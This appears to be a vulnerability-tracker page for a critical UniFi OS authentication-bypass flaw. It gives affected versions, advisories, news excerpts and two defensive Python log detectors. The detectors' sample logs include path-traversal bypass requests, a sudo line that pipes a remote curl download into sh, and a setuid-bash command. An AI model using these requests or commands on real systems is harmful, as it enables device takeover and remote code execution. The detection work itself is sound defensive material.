CVE-2026-34908
Published 2026-05-22
Priority: P1 (92) · Severity: critical · CVSS 3.1 base score: 10.0
Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
KEV · ITW
CISA Known Exploited Vulnerability, due 2026-06-26
Exploited in the wild
EPSS: 2.45% (82.4th percentile)
A malicious actor with access to the network could exploit an Improper Access Control vulnerability found in UniFi OS devices to make unauthorized changes to the system.
Affected
62 ranges (showing 25)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| ubiquiti_inc | efg | < 5.1.12 | 5.1.12 |
| ubiquiti_inc | envr | < 5.1.12 | 5.1.12 |
| ubiquiti_inc | envr-core | < 5.1.12 | 5.1.12 |
| ubiquiti_inc | express_7 | < 5.1.12 | 5.1.12 |
| ubiquiti_inc | ucg-fiber | < 5.1.12 | 5.1.12 |
| ubiquiti_inc | ucg-industrial | < 5.1.12 | 5.1.12 |
| ubiquiti_inc | ucg-max | < 5.1.12 | 5.1.12 |
| ubiquiti_inc | ucg-ultra | < 5.1.12 | 5.1.12 |
| ubiquiti_inc | uck | < 5.1.12 | 5.1.12 |
| ubiquiti_inc | uck-enterprise | < 5.1.12 | 5.1.12 |
| ubiquiti_inc | uckp | < 5.1.12 | 5.1.12 |
| ubiquiti_inc | udm | < 5.1.12 | 5.1.12 |
| ubiquiti_inc | udm-beast | < 5.1.11 | 5.1.11 |
| ubiquiti_inc | udm-pro | < 5.1.12 | 5.1.12 |
| ubiquiti_inc | udm-pro-max | < 5.1.12 | 5.1.12 |
| ubiquiti_inc | udm-se | < 5.1.12 | 5.1.12 |
| ubiquiti_inc | udr | < 5.1.12 | 5.1.12 |
| ubiquiti_inc | udr-5g | < 5.1.12 | 5.1.12 |
| ubiquiti_inc | udr7 | < 5.1.12 | 5.1.12 |
| ubiquiti_inc | udw | < 5.1.12 | 5.1.12 |
| ubiquiti_inc | unas-2 | < 5.1.10 | 5.1.10 |
| ubiquiti_inc | unas-4 | < 5.1.10 | 5.1.10 |
| ubiquiti_inc | unas-pro | < 5.1.10 | 5.1.10 |
| ubiquiti_inc | unas-pro-4 | < 5.1.10 | 5.1.10 |
| ubiquiti_inc | unas-pro-8 | < 5.1.10 | 5.1.10 |
Detection & IOCs (extracted from sources)
- The authentication bypass exploits a mismatch between how UniFi OS validates and routes requests: the authentication component evaluates the raw request URI, while Nginx routes on a normalized URI. Craft detection for requests that target authentication-exempt endpoints in raw form but resolve to protected internal routes after normalization.
- Privilege escalation to root is trivial because the affected service account has passwordless sudo access to several system binaries. Monitor for unexpected sudo commands originating from the ucs-update service account.
- Bishop Fox released a free detection script on GitHub that safely sends a specially crafted request to the vulnerable code path without executing dangerous commands, classifying the target as 'vulnerable', 'patched', 'unaffected' or 'inconclusive'. Use it to identify unpatched instances.
- Successful compromise of a UniFi OS device can enable lateral movement across the broader network, including the physical-access doors, surveillance cameras and identity systems governed by the console. Treat any UniFi OS compromise as a full network-level incident.
- CVE-2026-34908 is part of a three-CVE chain (CVE-2026-34908, CVE-2026-34909, CVE-2026-34910). All three must be patched together; patching only CVE-2026-34908 in isolation does not eliminate the unauthenticated RCE risk.
- For UniFi OS Server, the affected scope is versions 5.0.6 and earlier; versions 5.0.8 and later are confirmed unaffected by the full exploit chain. UniFi console firmware has its own per-product fixed versions (see the Affected table above).
- The Bishop Fox script does NOT detect active attacks, past exploitation, or the presence of persistence mechanisms or backdoors; it only reports whether the instance is currently vulnerable.
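The raw-versus-normalized URI mismatch in the first bullet is something a detection rule can test directly. Below is an added example, not code from Ubiquiti, Bishop Fox or any other cited source, of a log-scanning check in Python: it normalizes each request target the way a reverse proxy would (percent-decoding, with a second pass to catch double encoding, then dot-segment removal) and flags requests whose raw path falls under an authentication-exempt prefix but whose normalized path lands under a protected prefix. The prefix lists, log field layout and access-log lines are constructed placeholders, not UniFi OS's real routes or log format; the same check applies to any deployment where an auth layer and a router see different forms of the path.

```python
"""Raw-vs-normalized URI mismatch detector (added example; hypothetical routes)."""
import re
from urllib.parse import unquote

# Hypothetical prefixes, NOT UniFi OS's real routing table: paths the auth
# layer lets through unauthenticated when matched against the RAW request
# string, and internal routes the proxy only reaches after normalization.
EXEMPT_PREFIXES = ("/api/public", "/login", "/static")
PROTECTED_PREFIXES = ("/api/system", "/api/users")

# Combined-log-style access line; the field layout is assumed for the example.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)


def normalize_path(target: str) -> str:
    """Approximate a reverse proxy's pre-routing normalization: drop the
    query string, percent-decode twice (catches %252e double encoding),
    then apply RFC 3986 remove_dot_segments and collapse empty segments."""
    path = target.split("?", 1)[0]
    path = unquote(unquote(path))
    out = []
    for seg in path.split("/"):
        if seg in ("", "."):
            continue            # '//' and '/./' contribute nothing
        if seg == "..":
            if out:
                out.pop()       # climb one level, never above root
            continue
        out.append(seg)
    return "/" + "/".join(out)


def _under(path: str, prefixes) -> bool:
    """True if path equals a prefix or sits inside it as a directory."""
    path = path.rstrip("/") or "/"
    return any(path == p or path.startswith(p + "/") for p in prefixes)


def classify(target: str) -> str:
    """Compare what the auth check sees (raw path) with where the router
    sends the request (normalized path)."""
    raw_path = target.split("?", 1)[0]
    norm = normalize_path(target)
    exempt_by_raw = _under(raw_path, EXEMPT_PREFIXES)
    protected_by_norm = _under(norm, PROTECTED_PREFIXES)
    if exempt_by_raw and protected_by_norm:
        return "mismatch"       # auth skipped, internal route reached
    if protected_by_norm:
        return "protected"      # normal, auth-gated request
    return "benign"


def scan(log_text: str) -> list:
    """Return the mismatched requests found in access-log text."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        if classify(m["target"]) == "mismatch":
            hits.append({
                "ip": m["ip"], "method": m["method"], "status": m["status"],
                "raw": m["target"], "normalized": normalize_path(m["target"]),
            })
    return hits


# Constructed sample lines (documentation IP ranges); not real traffic.
SAMPLE_LOG = """\
203.0.113.5 - - [09/Jun/2026:10:01:02 +0000] "GET /api/public/status HTTP/1.1" 200
203.0.113.7 - - [09/Jun/2026:10:01:05 +0000] "POST /api/public/../system/reboot HTTP/1.1" 200
203.0.113.7 - - [09/Jun/2026:10:01:09 +0000] "POST /login/%2e%2e/api/users/admin?x=1 HTTP/1.1" 200
198.51.100.2 - - [09/Jun/2026:10:02:00 +0000] "GET /api/system/info HTTP/1.1" 401
"""

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(f"{hit['ip']} {hit['method']} {hit['raw']} -> {hit['normalized']} [{hit['status']}]")
```

Run against real proxy logs, replace the two prefix tuples with the actual exempt and protected routes of the deployment and point it at the access log of the component that does the routing, since that is the only place where both the raw target and the eventual route are recoverable. A 200 on a flagged line is the strong signal; a 401 or 404 means the bypass was attempted but did not land.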
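For the sudo bullet, one concrete monitor is a baseline over sudo syslog entries. The following is an added example, not from Ubiquiti or any cited source: it parses the standard sudo log line (`user : TTY=... ; PWD=... ; USER=... ; COMMAND=...`) and, for a baselined service account, flags any sudo command whose binary is outside the expected set, any shell spawned through sudo, and any command carrying shell metacharacters. The account name ucs-update is from the source; the baseline command set, hostname and log lines are constructed assumptions, not the device's real sudoers policy.

```python
"""Baseline monitor for sudo use by a service account (added example)."""
import re
import shlex

# Hypothetical baseline, NOT the device's real sudoers policy: the binaries
# the service account is expected to invoke through sudo.
SERVICE_ACCOUNT_BASELINE = {
    "ucs-update": {"/usr/bin/systemctl", "/usr/bin/apt-get"},
}
SHELLS = {"/bin/sh", "/bin/bash", "/bin/dash", "/usr/bin/sh", "/usr/bin/bash"}
METACHARS = set(";|&`$")

# Standard sudo syslog line: "sudo: <user> : TTY=.. ; PWD=.. ; USER=.. ; COMMAND=.."
SUDO_RE = re.compile(
    r"sudo:\s+(?P<user>\S+)\s+:\s+.*?USER=(?P<target>\S+)\s+;\s+COMMAND=(?P<cmd>.+)$"
)


def check_sudo_line(line: str):
    """Return a finding dict for a suspicious sudo line, else None."""
    m = SUDO_RE.search(line)
    if not m:
        return None
    user, target, cmd = m["user"], m["target"], m["cmd"].strip()
    allowed = SERVICE_ACCOUNT_BASELINE.get(user)
    if allowed is None:
        return None                         # only baselined service accounts
    try:
        argv = shlex.split(cmd)
    except ValueError:                      # unbalanced quotes: fall back
        argv = cmd.split()
    binary = argv[0] if argv else ""
    reasons = []
    if binary not in allowed:
        reasons.append(f"binary {binary} not in baseline for {user}")
    if binary in SHELLS:
        reasons.append("shell spawned via sudo")
    if METACHARS & set(cmd):
        reasons.append("shell metacharacters in command")
    if not reasons:
        return None
    return {"user": user, "target": target, "command": cmd, "reasons": reasons}


def scan_sudo_log(text: str) -> list:
    """Apply check_sudo_line to every line and collect the findings."""
    findings = []
    for line in text.splitlines():
        f = check_sudo_line(line)
        if f:
            findings.append(f)
    return findings


# Constructed sample lines; hostname, IP and commands are placeholders.
SAMPLE_AUTH_LOG = """\
Jun  9 10:03:11 console sudo: ucs-update : TTY=unknown ; PWD=/ ; USER=root ; COMMAND=/usr/bin/systemctl restart example.service
Jun  9 10:03:40 console sudo:    admin : TTY=pts/0 ; PWD=/home/admin ; USER=root ; COMMAND=/usr/bin/apt-get update
Jun  9 10:05:02 console sudo: ucs-update : TTY=unknown ; PWD=/tmp ; USER=root ; COMMAND=/bin/sh -c curl -s http://203.0.113.9/x | sh
Jun  9 10:05:03 console sudo: ucs-update : TTY=unknown ; PWD=/tmp ; USER=root ; COMMAND=/usr/bin/chmod u+s /bin/bash
"""

if __name__ == "__main__":
    for f in scan_sudo_log(SAMPLE_AUTH_LOG):
        print(f"{f['user']} -> {f['target']}: {f['command']}  ({'; '.join(f['reasons'])})")
```

The baseline should be populated from the device's actual sudoers entries for the account rather than guessed, and the first binary in the command is the right thing to compare because sudoers rules are matched on it. A binary inside the baseline can still be abused (a permitted editor or package manager with a shell escape, for instance), so the metacharacter and shell checks are a second layer, not a replacement for reviewing what the allowlisted binaries can do.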
CVSS provenance
- NVD (v3.1): 10.0 CRITICAL, CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
- VulnCheck: 10.0 CRITICAL
- CISA: 10.0 CRITICAL
VulDB
CVE-2026-34908 [CRITICAL] Ubiquiti UniFi OS Server prior 5.0.8 access control (WID-SEC-2026-1639)
vuldb · 2026-06-23 · CVSS 10.0
A vulnerability identified as critical has been detected in Ubiquiti UniFi OS Server, UDM, UDM-Pro, UDM-SE, UDM-Pro-Max, UDM-Beast, EFG, UDW, UDR, UDR7, UDR-5G, Express 7, UNVR, UNVR-Pro, UNVR-Instant, UNVR-G2, UNVR-G2-Pro, ENVR, ENVR-Core, UNAS-2, UNAS-4, UNAS-Pro, UNAS-Pro-4, UNAS-Pro-8, UCKP, UCK, UCK-Enterprise, UCG-Ultra, UCG-Max, UCG-Fiber and UCG-Industrial. This vulnerability affects unknown code. Performing a manipulation results in improper access controls.
This vulnerability is known as CVE-2026-34908. Remote exploitation of the attack is possible. Furthermore, an exploit is available.
You should upgrade the affected component.
GHSA
CVE-2026-34908 [CRITICAL] CWE-284 GHSA-p8c5-xwrc-584f
ghsa_unreviewed · 2026-05-22
A malicious actor with access to the network could exploit an Improper Access Control vulnerability found in UniFi OS devices to make unauthorized changes to the system.
VulnCheck
CVE-2026-34908 [CRITICAL] Improper Access Control
vulncheck · 2026 · CVSS 10.0
A malicious actor with access to the network could exploit an Improper Access Control vulnerability found in UniFi OS devices to make unauthorized changes to the system.
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://www.pwndefend.com/2026/06/09/cve-2026-34910-exploitation-itw-building-a-botnet-mirai/
CISA
CVE-2026-34908 [CRITICAL] CWE-284 Ubiquiti UniFi OS Improper Access Control Vulnerability
cisa · 2026-06-23 · CVSS 10.0
Affected: Ubiquiti UniFi OS
Ubiquiti UniFi OS contains an improper access control vulnerability which could allow a malicious actor with access to the network to make unauthorized changes to the system.
Required Action: Apply mitigations in accordance with vendor instructions, ensuring compliance with CISA’s BOD 26-04 Prioritizing Security Updates Based on Risk (see URL in Notes) guidance and CISA’s “Forensics Triage Requirements” (see URL in Notes). Follow applicable BOD 26-04 guidance for cloud services or discontinue use of the product if mitigations are unavailable. Stakeholders are responsible for evaluating each asset's internet exposure and ensuring adherence to BOD 26-04 patching guidelines.
Notes: https://co
No detection rules found.
No public exploits indexed.
Checkpoint
CVE-2026-20245 29th June – Threat Intelligence Report
blogs_checkpoint · 2026-06-29
For the latest discoveries in cyber research for the week of 29th June, please download our Threat Intelligence Bulletin.
TOP ATTACKS AND BREACHES
Polymarket, a large cryptocurrency-based prediction market, has confirmed a supply chain attack after a third-party frontend vendor breach led to malicious JavaScript being injected into its website. Attackers tricked users into approving fraudulent transactions, stealing about $3 million from fewer than 15 accounts, while the b
Hackernews
CVE-2025-67038 [CRITICAL] CISA Warns Critical Lantronix EDS5000 Flaw Is Being Actively Exploited
blogs_hackernews · 2026-06-24 · CVSS 9.8
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Tuesday warned of active exploitation of a critical security flaw impacting Lantronix EDS5000 Series devices, urging Federal Civilian Executive Branch (FCEB) agencies to apply the fixes by June 26, 2026.
The vulnerability in question is CVE-2025-67038 (CVSS score: 9.8), a code injection flaw that could result in the execution of arbitrary commands with elevated privileges.
"The HTTP RPC module executes a shell command to write logs when the user's authentication fails," according to the
Bleepingcomputer
CVE-2026-34908 [CRITICAL] CISA warns of max severity Ubiquiti flaws exploited in attacks
blogs_bleepingcomputer · 2026-06-24 · CVSS 9.8
By Bill Toulas
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) is warning of hackers actively exploiting flaws in Ubiquiti UniFi OS and Lantronix serial-to-ethernet servers.
According to the BOD 26-04 directive, federal agencies have three days to apply available security updates or vendor-recommended mitigations.
The Ubiquiti flaws that CISA added to its catalog of Known Exploited Vulnerabilities are:
CVE-2026-34908: an access control bypass flaw that allows an unauthenticated attacker to make unauthorized changes to a UniFi OS system, potentially leading to full system compromise.
CVE-2026-34909: a directory/path traversal vulnerability that allows an attacker to access sensitive files on the unde
Hackernews
CVE-2026-11645 [HIGH] ⚡ Weekly Recap: Chrome 0-Day, UniFi Exploits, macOS Stealers, VPN Flaw and More
blogs_hackernews · 2026-06-15 · CVSS 8.8
Stuff broke again. Not in a movie way. An old tool was left exposed. An abandoned package was abused. A deprecated feature was still running in prod.
This week is the same lesson in a new form: phishing kits are easier to rent, AI names are useful bait, old login paths still fail, and forgotten software keeps becoming someone else's entry point.
Scroll through the full Monday Cybersecurity Recap below for the news, tools, webinars, and fixes worth your time this week.
## ⚡ Threat of the Week
Google Patches Actively Exploited Chrome 0-Day - G
Hackernews
CVE-2025-48595 [HIGH] ⚡ Weekly Recap: Instagram Account Hacks, Android Zero-Day, GitHub Worm and More
blogs_hackernews · 2026-06-08 · CVSS 8.4
Monday again. The weekend was meant to be quiet. It wasn't. Last week had poisoned packages, a broken AI helper, and a worm tearing through repos. The ugly part: basic tricks still worked.
A chatbot got fooled. A bot token got leaked inside the malware. The same old mistakes showed up again. And while everyone chased the loud stuff, quieter attackers sat in inboxes for months, reading mail and stealing it bit by bit.
Lots to cover. Grab coffee. Read up.
## ⚡ Threat of the Week
Miasma Worm Hits 73 Microsoft GitHub Repositories in Supply Chain
Bleepingcomputer
CVE-2026-34908 [CRITICAL] Critical UniFi OS bug lets hackers gain root without authentication
blogs_bleepingcomputer · 2026-06-08 · CVSS 10.0
By Bill Toulas
Attackers can chain three already fixed vulnerabilities in the Ubiquiti UniFi OS server to execute remote code with root privileges and without authentication.
The security issues are tracked as CVE-2026-34908, CVE-2026-34909, and CVE-2026-34910. They have been addressed in May and impact UniFi OS Server versions 5.0.6 and earlier.
While all three flaws received the maximum severity rating despite their exploitation requiring access to the network, the vendor's advisory did not mention that they could be chained for remote code execution.
CVE-2026-34908 is an improper access control flaw that can allow unauthorized changes to vulnerable systems
CVE-2026-34909 is a path traversal vulnerability that c
Hackernews
CVE-2026-46333 ⚡ Weekly Recap: Linux Flaws, Defender 0-Days, Router Botnets, and Supply Chain Chaos
blogs_hackernews · 2026-05-25
Monday recap. Same mess, new week.
A sketchy dev tool got people pwned, old bugs came back from the dead, and security products somehow needed protecting from themselves. A bunch of companies spent the week checking old boxes and forgotten servers they should've patched years ago. Good times.
Phishing crews are getting smarter too - less obvious scam junk, more targeted stuff that actually looks real. Meanwhile, botnets are grabbing anything exposed to the internet like it's free candy. The Internet's still a dumpster fire.
Let’s get into
Bleepingcomputer
CVE-2026-34908 [CRITICAL] Ubiquiti patches three max severity UniFi OS vulnerabilities
blogs_bleepingcomputer · 2026-05-22 · CVSS 10.0
By Sergiu Gatlan
Ubiquiti has released security updates to patch three maximum severity vulnerabilities in UniFi OS that can be exploited by remote attackers without privileges.
UniFi OS is a unified operating system that powers UniFi Consoles and helps manage IT infrastructure, including networking, security, and other services, as well as UniFi applications such as UniFi Network, UniFi Protect, UniFi Access, UniFi Talk, and UniFi Connect.
The first flaw ( CVE-2026-34908 ) enables attackers to make unauthorized changes to targeted systems by exploiting an Improper Access Control weakness in UniFi OS, while the second ( CVE-2026-34909 ) allows them to access files on the underlying system by abusing a Path Traversal vulner
Timeline
- 2026-05-22: Published
- 2026-06-23: Added to CISA KEV
- Exploited in the wild